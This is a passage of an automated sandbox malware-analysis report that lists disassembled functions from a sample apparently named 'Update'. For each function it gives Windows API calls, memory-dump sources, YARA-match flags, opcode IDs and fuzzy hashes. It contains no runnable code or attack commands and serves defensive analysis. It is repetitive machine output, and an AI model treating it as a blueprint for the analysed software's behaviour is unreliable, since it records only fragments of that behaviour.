                                                                                            • Instruction Fuzzy Hash: 59F0A7364083304F8B355E29B4455DDB7FDAFB13613540455D484CBA11CB30ED51C6D1
                                                                                            Function 6C3A3E91 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,6C3A3F2D,?,?,00000000,?,?,?,6C3A3DEB,00000002,FlsGetValue,6C3B17C4,6C3B17CC), ref: 6C3A3E9E
                                                                                            • GetLastError.KERNEL32(?,6C3A3F2D,?,?,00000000,?,?,?,6C3A3DEB,00000002,FlsGetValue,6C3B17C4,6C3B17CC,?,?,6C3993D1), ref: 6C3A3EA8
                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,?), ref: 6C3A3ED0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                            • String ID: api-ms-
                                                                                            • API String ID: 3177248105-2084034818
                                                                                            • Opcode ID: 12d1a693c1042c2ee365416a994675b0ef47302cac77f9f46c95011dbd0eee5f
                                                                                            • Instruction ID: f03fd67b4c5f3dff88b0ff542ca83e45640ab4e1693a7f6a67866f34a501abbe
                                                                                            • Opcode Fuzzy Hash: 12d1a693c1042c2ee365416a994675b0ef47302cac77f9f46c95011dbd0eee5f
                                                                                            • Instruction Fuzzy Hash: 06E01A32384208B7EB011AA1DC06F593B69EB12B85F204520FA0CE98D1D762E5219E58
                                                                                            Function 6C38AADF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • AcquireSRWLockExclusive.KERNEL32(6C3BC354,G.7l,?,6C372362,6C3BC244,?,00000001,?,?,?,?,?,?,?), ref: 6C38AAE9
                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6C3BC354,?,6C372362,6C3BC244,?,00000001,?,?,?,?,?,?,?), ref: 6C38AB1C
                                                                                            • WakeAllConditionVariable.KERNEL32(6C3BC350,?,6C372362,6C3BC244,?,00000001,?,?,?,?,?,?,?), ref: 6C38AB27
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExclusiveLock$AcquireConditionReleaseVariableWake
                                                                                            • String ID: G.7l
                                                                                            • API String ID: 1466638765-3243727157
                                                                                            • Opcode ID: 46b7db0f4b45f885507d79f5af15aad16af6d293885d172bd071340f98880172
                                                                                            • Instruction ID: ded969e927f97663ada3b24c908a34845665ba432a1f3ff0c0e3f8c2963cef3a
                                                                                            • Opcode Fuzzy Hash: 46b7db0f4b45f885507d79f5af15aad16af6d293885d172bd071340f98880172
                                                                                            • Instruction Fuzzy Hash: 15F03975601640DFDB15EF58E48895477BCFF6B314B04405AE9098B701DA746800CFA8
                                                                                            Function 034ED830 Relevance: 6.4, APIs: 5, Instructions: 140COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • IsBadReadPtr.KERNEL32(?,00000014), ref: 034ED868
                                                                                            • IsBadReadPtr.KERNEL32(?,00000014), ref: 034ED938
                                                                                            • SetLastError.KERNEL32(0000007F), ref: 034ED963
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Read$ErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 2715074504-0
                                                                                            • Opcode ID: d0095261f17a44d99fac2c6b8577963e989a33041aab53d96ab10e53dae0d1d1
                                                                                            • Instruction ID: 0df81df4d1ef37067d67a02a42c1b2d7df0a31089ffcfed40ce41f7a209e1c8b
                                                                                            • Opcode Fuzzy Hash: d0095261f17a44d99fac2c6b8577963e989a33041aab53d96ab10e53dae0d1d1
                                                                                            • Instruction Fuzzy Hash: 4A419C71A0020AAFDB10CF99DC84B6AF3F9FF89315F1485AAD8599B351D771E901CB90
                                                                                            Function 6C3A15C6 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleOutputCP.KERNEL32(F1BBC535,00000000,00000000,?), ref: 6C3A1629
                                                                                              • Part of subcall function 6C39A751: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6C39D550,?,00000000,-00000008), ref: 6C39A7B2
                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6C3A187B
                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C3A18C1
                                                                                            • GetLastError.KERNEL32 ref: 6C3A1964
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                            • String ID:
                                                                                            • API String ID: 2112829910-0
                                                                                            • Opcode ID: 1c4b8f62f15932de89a56e5b389de26271229736623c177e848835a1ba72b6a9
                                                                                            • Instruction ID: 0ab2897d00945fdd7a6fe5b612d830416a140d4491405f7e1a3c5c67b6565187
                                                                                            • Opcode Fuzzy Hash: 1c4b8f62f15932de89a56e5b389de26271229736623c177e848835a1ba72b6a9
                                                                                            • Instruction Fuzzy Hash: 91D16875E05248DFCB05CFE8C880AEDBBB9EF09314F28416AE465AB751D630E956CF60
                                                                                            Function 6C3999CA Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: AdjustPointer
                                                                                            • String ID:
                                                                                            • API String ID: 1740715915-0
                                                                                            • Opcode ID: f9b20e78b7ed8508773fa9ea9de1f54ce289877a5935d906e89908187fd2e4bd
                                                                                            • Instruction ID: 32efb603152b7bcb97c9c07cd0dc84288a571290a060e234d19563645a72b041
                                                                                            • Opcode Fuzzy Hash: f9b20e78b7ed8508773fa9ea9de1f54ce289877a5935d906e89908187fd2e4bd
                                                                                            • Instruction Fuzzy Hash: 1C51F17260A706AFDB159F14D881BAAB3B8EF45318F20452DEC5A47A90F736E844CF90
                                                                                            Function 030539D3 Relevance: 6.1, APIs: 4, Instructions: 109COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564075355.0000000003040000.00000040.00001000.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_3040000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __calloc_crt__init_pointers__mtterm
                                                                                            • String ID:
                                                                                            • API String ID: 2478854527-0
                                                                                            • Opcode ID: 76c9643fd1df18821398edaab6323fbd9f0414cbbe87c74b2baaec3723e64a7d
                                                                                            • Instruction ID: 63b42fc8810f6d0532c8d0b466c7838c54d345c4aca375200b1d567150fb9cf3
                                                                                            • Opcode Fuzzy Hash: 76c9643fd1df18821398edaab6323fbd9f0414cbbe87c74b2baaec3723e64a7d
                                                                                            • Instruction Fuzzy Hash: 9A318B39903720EFFB52EB758C98A57BFA5EB44AA0B14855AFD10CA2B1EB308051DF40
                                                                                            Function 0091E3FC Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0091E430
                                                                                            • __isleadbyte_l.LIBCMT ref: 0091E463
                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,0091701E,?,00000000,00000000,?,?,?,?,0091701E,00000000), ref: 0091E494
                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,0091701E,00000001,00000000,00000000,?,?,?,?,0091701E,00000000), ref: 0091E502
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                            • String ID:
                                                                                            • API String ID: 3058430110-0
                                                                                            • Opcode ID: 7b64836bf0203443f1c00f9e4ad279cabdfb7da6de54c7dc67062b5fa7cbaf21
                                                                                            • Instruction ID: dbaa9261d4a09db2a1897ea22880f2e6f2a75af267f55b82bf35033a458d1a87
                                                                                            • Opcode Fuzzy Hash: 7b64836bf0203443f1c00f9e4ad279cabdfb7da6de54c7dc67062b5fa7cbaf21
                                                                                            • Instruction Fuzzy Hash: FF318131B0025AEFDB21DFA4D880AF97BB9AF41311B1985A9F8658B1E1E730DDC0DB51
                                                                                            Function 034FA5C2 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 034FA5F6
                                                                                            • __isleadbyte_l.LIBCMT ref: 034FA629
                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,0350FBA0,?,03502564,00000000,?,?,?,?,0350FBA0,03502564), ref: 034FA65A
                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,0350FBA0,00000001,03502564,00000000,?,?,?,?,0350FBA0,03502564), ref: 034FA6C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                            • String ID:
                                                                                            • API String ID: 3058430110-0
                                                                                            • Opcode ID: 3ad4a8332e85ca2c217f9d501a3c8f9e49b218b032be37ac683bad236df0bab1
                                                                                            • Instruction ID: aaf3f50b831c009d65941e923093f57092f63452fdf0cf452dd4a3f770357e51
                                                                                            • Opcode Fuzzy Hash: 3ad4a8332e85ca2c217f9d501a3c8f9e49b218b032be37ac683bad236df0bab1
                                                                                            • Instruction Fuzzy Hash: 3731E371A00245EFEB20DF64C8949BE7BB5BF01211F1D85AAE6A98F2A0D331D940CF58
                                                                                            Function 6C374E70 Relevance: 6.1, APIs: 4, Instructions: 103COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6C374EA5
                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6C374EC2
                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6C374EE3
                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6C374F79
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                            • String ID:
                                                                                            • API String ID: 593203224-0
                                                                                            • Opcode ID: b8d933a7ad7baa784c289e80fabcb0062808f41bbce00221bac8a28dbb6239e6
                                                                                            • Instruction ID: ccea9ad2205210507d60f197fc22ca3ff096f748f06fd6618465fee41d6c0b59
                                                                                            • Opcode Fuzzy Hash: b8d933a7ad7baa784c289e80fabcb0062808f41bbce00221bac8a28dbb6239e6
                                                                                            • Instruction Fuzzy Hash: 6E415871D002188FCB25DF94D884BEEB7B4FB48328F044229E814AB790E739A944CFA5
                                                                                            Function 6C372EB0 Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6C372EE5
                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6C372EFF
                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6C372F20
                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6C372FF5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                            • String ID:
                                                                                            • API String ID: 593203224-0
                                                                                            • Opcode ID: 8f54e743420ae132e96afa3555a8e3b6b74dd066964c85e52a617e4540bb2a02
                                                                                            • Instruction ID: 9ffd4b660fdc7ef5ce5f046780a4925f1feb7ffcb7bd1fe2c845f9bb4ed254b0
                                                                                            • Opcode Fuzzy Hash: 8f54e743420ae132e96afa3555a8e3b6b74dd066964c85e52a617e4540bb2a02
                                                                                            • Instruction Fuzzy Hash: 44415971E01614CFCB20DF94C944BDEB7B4FB58718F048219D895AB790D73AA904CFA5
                                                                                            Function 6C37CB70 Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6C37CBA5
                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6C37CBBF
                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6C37CBE0
                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6C37CCB5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                            • String ID:
                                                                                            • API String ID: 593203224-0
                                                                                            • Opcode ID: 402420853c8b1dca1f7aff750b68c6a96c08ab5ca05ceffefb6f86b8ecbc0503
                                                                                            • Instruction ID: 3b7e10e160fd4c2db3a793241fc9bf44fb6595a831abb15ec74355c520189491
                                                                                            • Opcode Fuzzy Hash: 402420853c8b1dca1f7aff750b68c6a96c08ab5ca05ceffefb6f86b8ecbc0503
                                                                                            • Instruction Fuzzy Hash: 20418D71E016198FCF20EF98D840B9EB7B4FF48B18F044119D895AB780D739A905CFA9
                                                                                            Function 6C37B4E0 Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6C37B515
                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6C37B52F
                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6C37B550
                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6C37B625
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                            • String ID:
                                                                                            • API String ID: 593203224-0
                                                                                            • Opcode ID: 497e02e8ff61ea16193dd94cdbbada1622fe1d5ab92ec85729f6c76e8215517f
                                                                                            • Instruction ID: b0a5e642fce9594f7c319239fd8ce2fc15f1b04d2a1e7fcca0ce74b254a44918
                                                                                            • Opcode Fuzzy Hash: 497e02e8ff61ea16193dd94cdbbada1622fe1d5ab92ec85729f6c76e8215517f
                                                                                            • Instruction Fuzzy Hash: 35414871E002188FDB24DF94D850BEEB7B5FB54728F044228D895AB780DB39A904CFA9
                                                                                            Function 00914407 Relevance: 6.1, APIs: 4, Instructions: 93synchronizationtimeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • timeGetTime.WINMM ref: 00914425
                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 00914434
                                                                                            • WaitForSingleObject.KERNEL32(?,00001770), ref: 00914482
                                                                                              • Part of subcall function 00913F37: GetCurrentThreadId.KERNEL32 ref: 00913F3C
                                                                                              • Part of subcall function 00913F37: send.WS2_32(?,10017440,00000010,00000000), ref: 00913F9D
                                                                                              • Part of subcall function 00913F37: SetEvent.KERNEL32(?), ref: 00913FC0
                                                                                              • Part of subcall function 00913F37: InterlockedExchange.KERNEL32(?,00000000), ref: 00913FCC
                                                                                              • Part of subcall function 00913F37: WSACloseEvent.WS2_32(?), ref: 00913FDA
                                                                                              • Part of subcall function 00913F37: shutdown.WS2_32(?,00000001), ref: 00913FF2
                                                                                              • Part of subcall function 00913F37: closesocket.WS2_32(?), ref: 00913FFC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: EventExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                                                                            • String ID:
                                                                                            • API String ID: 4080316033-0
                                                                                            • Opcode ID: cd026b78566f857b09982a36d15b79aaae0893a0b763f0313fae0352c7133491
                                                                                            • Instruction ID: 5795f707d0d4caf0cb4e3edfe96a45ae7a677f41c8ffba43e8b08646f9fdcfb0
                                                                                            • Opcode Fuzzy Hash: cd026b78566f857b09982a36d15b79aaae0893a0b763f0313fae0352c7133491
                                                                                            • Instruction Fuzzy Hash: 0A218276600708ABD220EFA9DC85B97B3E8EF9D711F004A0EF54AC7690D671E444CBA0
                                                                                            Function 034E8020 Relevance: 6.1, APIs: 4, Instructions: 91stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: lstrlen$_memset
                                                                                            • String ID:
                                                                                            • API String ID: 2425037729-0
                                                                                            • Opcode ID: e54a1aaabb96ac8cc8f6053f85f1454f3428392b067993565249d0da5d1d39a3
                                                                                            • Instruction ID: 5b52a0bd93306e0c8014c17962d218b970f64436eb5f5629f07a4e35eef64cf2
                                                                                            • Opcode Fuzzy Hash: e54a1aaabb96ac8cc8f6053f85f1454f3428392b067993565249d0da5d1d39a3
                                                                                            • Instruction Fuzzy Hash: 4521C7767002189FCF14DF59DC809BFB3A9EBC4B23B1A40AFED058B701E731995186A4
                                                                                            Function 6C39F665 Relevance: 6.1, APIs: 4, Instructions: 82COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 6C39A751: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6C39D550,?,00000000,-00000008), ref: 6C39A7B2
                                                                                            • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 6C39F6C9
                                                                                            • __dosmaperr.LIBCMT ref: 6C39F6D0
                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6C39F70A
                                                                                            • __dosmaperr.LIBCMT ref: 6C39F711
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 1913693674-0
                                                                                            • Opcode ID: f9de2857b76e507f63e983ad61e6ea81e2315fa810519e8f1169bf94b6c01f6b
                                                                                            • Instruction ID: 725c7d5fed5fe2b6d816d1857136111fb82acd95c68d5036e403205cab67d76c
                                                                                            • Opcode Fuzzy Hash: f9de2857b76e507f63e983ad61e6ea81e2315fa810519e8f1169bf94b6c01f6b
                                                                                            • Instruction Fuzzy Hash: 72219271604605AFDB109FA6CC8099AB7BDFF493AC7048619F859D7A50F732EC448FA1
                                                                                            Function 6C38F93F Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3f93522bfb483d4fdcf7a81b0b1db9ca7c8e99126a681f26687bfb418f2e793d
                                                                                            • Instruction ID: 362a43c944583695da337d3488621f1b902633a39a809aef7e987a5fc098a434
                                                                                            • Opcode Fuzzy Hash: 3f93522bfb483d4fdcf7a81b0b1db9ca7c8e99126a681f26687bfb418f2e793d
                                                                                            • Instruction Fuzzy Hash: 9A219F32205606BFCB00AF66CC8099A77ADEF0A36C7148615F85AD7A40EB32EC40CF61
                                                                                            Function 6C3A0C88 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 6C3A0C90
                                                                                              • Part of subcall function 6C39A751: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6C39D550,?,00000000,-00000008), ref: 6C39A7B2
                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6C3A0CC8
                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6C3A0CE8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 158306478-0
                                                                                            • Opcode ID: bdb1bfae88507fc24ea2d34645f701010e180528540fa7e665a535b9b1700f45
                                                                                            • Instruction ID: 0847181e951e19dcb498b4190e354dde1158500e19297446c3b1f8c815c5be3c
